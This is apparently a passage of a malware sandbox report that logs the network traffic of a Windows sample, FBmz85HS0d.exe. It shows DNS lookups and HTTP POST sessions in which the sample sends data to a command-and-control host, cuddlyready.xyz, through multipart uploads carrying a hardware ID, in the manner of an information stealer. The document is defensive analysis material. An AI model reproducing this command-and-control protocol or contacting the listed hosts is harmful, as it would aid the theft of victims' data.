                                                                                                                                                                                        Dec 23, 2024 09:23:56.051194906 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057221889 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057245016 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057322025 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.057328939 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063232899 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063271999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063292980 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063298941 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.063327074 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069622993 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069703102 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069709063 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069770098 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.069773912 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.072740078 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075833082 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075855017 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075903893 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075942039 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075942039 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075947046 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.075957060 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.077903032 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081789970 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081809998 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081856966 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081862926 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.081892014 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.104934931 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.104939938 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.104990005 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.235909939 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.235944986 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.235991001 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.236006975 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.236040115 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.236051083 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.239947081 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.239975929 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.240005970 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.240025043 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.240041018 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246112108 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246148109 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246177912 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246206999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.246217966 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252201080 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252254009 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252268076 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252281904 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.252310038 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258322001 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258392096 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258394003 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258408070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.258451939 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.259004116 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.259066105 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.260104895 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264646053 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264689922 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264712095 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264719963 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264745951 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264801025 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.264816999 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.268902063 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270839930 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270891905 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270905972 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270914078 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.270951986 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.276928902 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.276998043 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277018070 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277089119 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277601957 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.277662992 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.287003040 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429059029 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429095030 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429145098 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429173946 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429192066 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429219007 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.429459095 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441303968 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441333055 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441360950 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441390038 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.441399097 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443408012 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443456888 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443459988 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443474054 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.443506002 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447705030 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447727919 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447797060 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447804928 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447813988 CET443497523.5.25.82192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447834015 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.447849989 CET49752443192.168.2.73.5.25.82
                                                                                                                                                                                        Dec 23, 2024 09:23:56.453193903 CET49752443192.168.2.73.5.25.82
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 09:23:27.840410948 CET | 49664 | 53 | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 09:23:28.150536060 CET | 53 | 49664 | 1.1.1.1 | 192.168.2.7
Dec 23, 2024 09:23:49.989064932 CET | 52179 | 53 | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 09:23:50.127772093 CET | 53 | 52179 | 1.1.1.1 | 192.168.2.7
Dec 23, 2024 09:23:52.232785940 CET | 50506 | 53 | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 09:23:52.588196039 CET | 53 | 50506 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 09:23:27.840410948 CET | 192.168.2.7 | 1.1.1.1 | 0xec18 | Standard query (0) | cuddlyready.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:49.989064932 CET | 192.168.2.7 | 1.1.1.1 | 0x3516 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.232785940 CET | 192.168.2.7 | 1.1.1.1 | 0xa907 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 09:23:28.150536060 CET | 1.1.1.1 | 192.168.2.7 | 0xec18 | No error (0) | cuddlyready.xyz | - | 172.67.150.173 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:28.150536060 CET | 1.1.1.1 | 192.168.2.7 | 0xec18 | No error (0) | cuddlyready.xyz | - | 104.21.32.96 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:50.127772093 CET | 1.1.1.1 | 192.168.2.7 | 0x3516 | No error (0) | bitbucket.org | - | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:50.127772093 CET | 1.1.1.1 | 192.168.2.7 | 0x3516 | No error (0) | bitbucket.org | - | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:50.127772093 CET | 1.1.1.1 | 192.168.2.7 | 0x3516 | No error (0) | bitbucket.org | - | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.25.82 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.28.244 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.110.195 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.211.241 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.9.216 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.15.185.29 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.113.89 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:23:52.588196039 CET | 1.1.1.1 | 192.168.2.7 | 0xa907 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.182.101.89 | A (IP address) | IN (0x0001) | false
• cuddlyready.xyz
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 172.67.150.173 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:29 UTC | 262 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: cuddlyready.xyz
2024-12-23 08:23:29 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-12-23 08:23:30 UTC | 1119 | IN | HTTP/1.1 200 OK
  Date: Mon, 23 Dec 2024 08:23:30 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=2g0e78k3mqng9sppirh8mritc2; expires=Fri, 18 Apr 2025 02:10:08 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=udTXNOK3bZ3ZmNzJQQ1Esmh86ugb6Yn4RPa7sLYHpqRwbPLQg2NeSdPI%2Fj4EqkV0SA3HObKlwYZldB8ejVdG4oiegf9EaCHZXjhc0OvdgwyTrnY93UOcRcyCBbzcMcRM9N0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8f66f32aaa084238-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1596&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1732937&cwnd=244&unsent_bytes=0&cid=85d11d31fa86ce6e&ts=817&x=0"
                                                                                                                                                                                        2024-12-23 08:23:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                        2024-12-23 08:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49700 | Destination IP: 172.67.150.173 | Destination Port: 443 | PID: 7312 | Process: C:\Users\user\Desktop\FBmz85HS0d.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:31 UTC | 263 | OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: cuddlyready.xyz
2024-12-23 08:23:31 UTC | 53 | OUT
    Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 08:23:32 UTC | 1133 | IN
    HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 08:23:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=4mb1sjiabh7rcm82nj41f0pupb; expires=Fri, 18 Apr 2025 02:10:11 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSOU%2FICZ823aIXdF6EGlYHj4s2jgZfikwJaE863keNSW1JDwIUGGcllY1Ygj5%2Fk%2F7I%2BhFAdUAC%2F%2ByFH5dRXCUdeniEXTEsI4f0DH%2FQZ%2FDIwzkxhOmkmMiJRDVBAziqHqIKM%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f66f337d9c70c92-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1462&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1947965&cwnd=165&unsent_bytes=0&cid=8b9cb33293b461b9&ts=783&x=0"


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49701 | Destination IP: 172.67.150.173 | Destination Port: 443 | PID: 7312 | Process: C:\Users\user\Desktop\FBmz85HS0d.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:34 UTC | 281 | OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6QLOBSPXZT92PZ4HKW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12850
    Host: cuddlyready.xyz
2024-12-23 08:23:34 UTC | 12850 | OUT
    Data Raw: 2d 2d 36 51 4c 4f 42 53 50 58 5a 54 39 32 50 5a 34 48 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 51 4c 4f 42 53 50 58 5a 54 39 32 50 5a 34 48 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 51 4c 4f 42 53 50 58 5a 54 39 32 50 5a 34 48 4b 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
    Data Ascii (line breaks restored from the CR LF bytes above; dump truncated by the sandbox):
        --6QLOBSPXZT92PZ4HKW
        Content-Disposition: form-data; name="hwid"

        9AA29BAF5EACF5F1AC8923850305D13E
        --6QLOBSPXZT92PZ4HKW
        Content-Disposition: form-data; name="pid"

        2
        --6QLOBSPXZT92PZ4HKW
        Content-Disposition: form-data; name="lid"

        LOGS11--LiveT
2024-12-23 08:23:35 UTC | 1126 | IN
    HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 08:23:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=umnmm2rnoesb0glhbbcjiqeqv3; expires=Fri, 18 Apr 2025 02:10:13 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gpE6XYlWUQ1H1TqfbYE2WWVImoseAsUYHo2BZK%2BKE6t6NyQ%2FvjFPOI4DZcroo055P0p0o2kTX334yhTmCDZ%2BZrGrFK5A8B1A4eSbpUFvoSNtT7e3pgf2A7GUi6eP9dneOk%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f66f3481ffd5e71-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1645&rtt_var=642&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13789&delivery_rate=1775075&cwnd=238&unsent_bytes=0&cid=09c28c41f45b685c&ts=994&x=0"
2024-12-23 08:23:35 UTC | 20 | IN
    Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                        2024-12-23 08:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49703 | 172.67.150.173 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:36 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OIEL5BSFKMMBH6W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15064
Host: cuddlyready.xyz
2024-12-23 08:23:36 UTC | 15064 | OUT | Data Raw: 2d 2d 4f 49 45 4c 35 42 53 46 4b 4d 4d 42 48 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 41 32 39 42 41 46 35 45 41 43 46 35 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 49 45 4c 35 42 53 46 4b 4d 4d 42 48 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 49 45 4c 35 42 53 46 4b 4d 4d 42 48 36 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
Data Ascii: --OIEL5BSFKMMBH6WContent-Disposition: form-data; name="hwid"9AA29BAF5EACF5F1AC8923850305D13E--OIEL5BSFKMMBH6WContent-Disposition: form-data; name="pid"2--OIEL5BSFKMMBH6WContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-12-23 08:23:37 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:23:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=agiou0d2mj3pch27qve1gkjuhk; expires=Fri, 18 Apr 2025 02:10:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A35f5btv%2FOzXcCr%2BnpcqRufESmE61RPYKDxkd3IQypOptyY1IlU6zjikKPjxOhMquMYZolLCZcfLL%2BhFejj5f73DvJwtob%2BW33u4kCfweh459KV%2B%2FJRHal27p%2Bv3Poactdk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66f3567ecc0f69-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1501&rtt_var=564&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16000&delivery_rate=1936339&cwnd=250&unsent_bytes=0&cid=b4de541d8c2d0618&ts=958&x=0"
2024-12-23 08:23:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:23:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49709 | 172.67.150.173 | 443 | 7312 | C:\Users\user\Desktop\FBmz85HS0d.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:23:38 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Z8U6FMPNN7YKQ3BQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20395
Host: cuddlyready.xyz
